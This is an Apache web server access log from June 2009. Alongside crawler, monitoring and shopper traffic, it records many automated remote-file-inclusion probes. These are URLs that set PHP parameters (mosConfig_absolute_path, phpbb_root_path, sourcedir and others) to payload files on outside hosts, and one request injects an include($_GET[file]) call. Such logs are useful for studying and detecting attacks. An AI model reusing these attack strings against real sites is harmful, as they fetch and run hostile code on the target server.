74.54.32.201 - - [15/Jun/2009:03:23:20 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:03:23:26 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:03:23:26 -0400] "GET /lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:03:23:26 -0400] "GET /logs/error_log.Q109060500%20%20/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:03:23:27 -0400] "GET /logs/error_log.Q109060600%20%20/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
116.125.126.72 - - [15/Jun/2009:03:23:34 -0400] "GET /logs/access_log.Q109060100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:23:46 -0400] "GET /logs/access_log.Q109060100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:23:47 -0400] "GET /logs/access_log.Q109060100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jun/2009:03:23:48 -0400] "GET /logs/access_log.Q109060900/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
65.55.106.113 - - [15/Jun/2009:03:23:59 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
84.201.208.50 - - [15/Jun/2009:03:24:07 -0400] "GET //main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:24:07 -0400] "GET /logs//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:24:07 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:24:07 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:24:09 -0400] "GET //main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:24:09 -0400] "GET /logs//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:24:09 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:24:09 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:24:22 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:24:22 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:24:23 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.135.14 - - [15/Jun/2009:03:24:23 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:24:35 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:24:36 -0400] "GET /logs/error_log.Q109051300//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:24:36 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:24:36 -0400] "GET /logs/error_log.Q109052500//modules/4nAlbum/public/displayCategory.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
74.6.17.151 - - [15/Jun/2009:03:24:38 -0400] "GET /logs/error_log.Q109021100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.151 - - [15/Jun/2009:03:24:20 -0400] "GET /images/ACE_Fall04_BestBuys.pdf HTTP/1.0" 200 5886198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [15/Jun/2009:03:24:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.54.154.10 - - [15/Jun/2009:03:25:08 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:03:25:14 -0400] "GET /logs/access_log.Q108112300%20%20/index.php?redir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [15/Jun/2009:03:25:40 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [15/Jun/2009:03:25:40 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:25:41 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:25:41 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:25:41 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:25:45 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.6.17.151 - - [15/Jun/2009:03:25:48 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0 HTTP/1.0" 200 56583 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.249.36.194 - - [15/Jun/2009:03:25:49 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:25:49 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:25:49 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:25:49 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:25:54 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:25:54 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:25:54 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:26:17 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:26:17 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:26:17 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.214.37.11 - - [15/Jun/2009:03:26:53 -0400] "GET /logs/access_log.Q109060100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://haar13.com//components/com_dat/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
217.125.38.117 - - [15/Jun/2009:03:28:15 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.125.126.72 - - [15/Jun/2009:03:28:43 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.125.126.72 - - [15/Jun/2009:03:28:43 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
116.125.126.72 - - [15/Jun/2009:03:28:43 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
65.55.106.113 - - [15/Jun/2009:03:28:49 -0400] "GET /logs/access_log.Q107073000 HTTP/1.1" 404 224 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
98.116.62.213 - - [15/Jun/2009:03:29:13 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
98.116.62.213 - - [15/Jun/2009:03:29:13 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:29:39 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:29:39 -0400] "GET /?sourcedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:03:29:39 -0400] "GET /logs/?sourcedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 5572 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:03:29:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.125.126.72 - - [15/Jun/2009:03:30:15 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [15/Jun/2009:03:32:06 -0400] "GET /logs/access_log.Q109050300//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [15/Jun/2009:03:32:06 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:32:11 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:32:16 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:32:49 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:32:49 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.49.29 - - [15/Jun/2009:03:33:14 -0400] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.122.49.29 - - [15/Jun/2009:03:33:14 -0400] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.122.49.29 - - [15/Jun/2009:03:33:14 -0400] "GET /logs/access_log.Q109052900/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.122.49.29 - - [15/Jun/2009:03:33:14 -0400] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.122.49.29 - - [15/Jun/2009:03:33:14 -0400] "GET /logs/access_log.Q109052900/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.122.49.29 - - [15/Jun/2009:03:33:14 -0400] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.122.49.29 - - [15/Jun/2009:03:33:24 -0400] "GET /logs/access_log.Q109052800/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.122.49.29 - - [15/Jun/2009:03:33:24 -0400] "GET /logs/access_log.Q109052800/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:03:33:39 -0400] "GET /logs/error_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.112.121.225 - - [15/Jun/2009:03:33:44 -0400] "GET /logs/access_log.Q109060800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.169.189.169 - - [15/Jun/2009:03:34:31 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [15/Jun/2009:03:34:37 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1085984555C29400171F04U+M37+ENG HTTP/1.1" 200 37508 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [15/Jun/2009:03:34:41 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1085984A51D224001A9F04U+M37+ENG HTTP/1.1" 200 76660 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085984555C29400171F04U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [15/Jun/2009:03:34:50 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1085984E52A2B400184F04U+M37+ENG HTTP/1.1" 200 44717 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
209.59.12.99 - - [15/Jun/2009:03:34:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.169.189.169 - - [15/Jun/2009:03:34:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L108598465B626400275F04U+M37+ENG HTTP/1.1" 200 48089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085984E52A2B400184F04U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
118.129.166.10 - - [15/Jun/2009:03:34:57 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.169.189.169 - - [15/Jun/2009:03:35:12 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1085984C5F82D40029CF04U+M37+ENG HTTP/1.1" 200 39583 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L108598465B626400275F04U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
121.169.189.169 - - [15/Jun/2009:03:35:16 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L108598445E02F4001DEF04U+WSEQ(S0020):1+OKEY(A0190):001335953001S0087060+WEBKEY(A0100):PRTORD HTTP/1.1" 200 30023 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085984C5F82D40029CF04U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
118.129.166.10 - - [15/Jun/2009:03:35:19 -0400] "GET /logs/access_log.Q109052800%20%20/?sourcedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.146.231.193 - - [15/Jun/2009:03:36:39 -0400] "GET /logs//atom.php5?page=http://www.fzv.uni-mb.si/page/components/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.146.231.193 - - [15/Jun/2009:03:36:39 -0400] "GET //atom.php5?page=http://www.fzv.uni-mb.si/page/components/test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.142.148.142 - - [15/Jun/2009:03:36:54 -0400] "GET /logs/error_log.Q109053100///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.142.148.142 - - [15/Jun/2009:03:36:54 -0400] "GET /logs///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.55.163.229 - - [15/Jun/2009:03:37:46 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
83.55.163.229 - - [15/Jun/2009:03:37:46 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
83.55.163.229 - - [15/Jun/2009:03:37:49 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
83.55.163.229 - - [15/Jun/2009:03:37:49 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.1; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
74.6.17.151 - - [15/Jun/2009:03:37:52 -0400] "GET /images/ACE_tutor_1Stage_Ridge.pdf HTTP/1.0" 200 1610345 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.49.29 - - [15/Jun/2009:03:38:24 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.49.29 - - [15/Jun/2009:03:38:33 -0400] "GET /logs/access_log.Q109052900%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.49.29 - - [15/Jun/2009:03:38:44 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.49.29 - - [15/Jun/2009:03:38:47 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://keikashi.webs.com/scanner_id/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:03:39:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.142.148.142 - - [15/Jun/2009:03:41:22 -0400] "GET /logs/error_log.Q109053100%20%20///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.169.189.169 - - [15/Jun/2009:03:43:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1085984C5D820400364F04U+M37+ENG HTTP/1.1" 200 44717 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085984C5F82D40029CF04U+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
200.142.148.142 - - [15/Jun/2009:03:43:48 -0400] "GET /logs/access_log.Q109053100///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.142.148.142 - - [15/Jun/2009:03:43:48 -0400] "GET /logs/access_log.Q109052200///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
204.203.92.2 - - [15/Jun/2009:03:44:46 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
204.203.92.2 - - [15/Jun/2009:03:44:52 -0400] "GET /logs/access_log.Q109060100//appserv/main.php?appserv_root=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:03:44:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [15/Jun/2009:03:44:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109DD5482FF2E3003A0E067+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [15/Jun/2009:03:45:16 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:45:16 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:45:16 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [15/Jun/2009:03:45:16 -0400] "GET /logs/access_log.Q109051800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
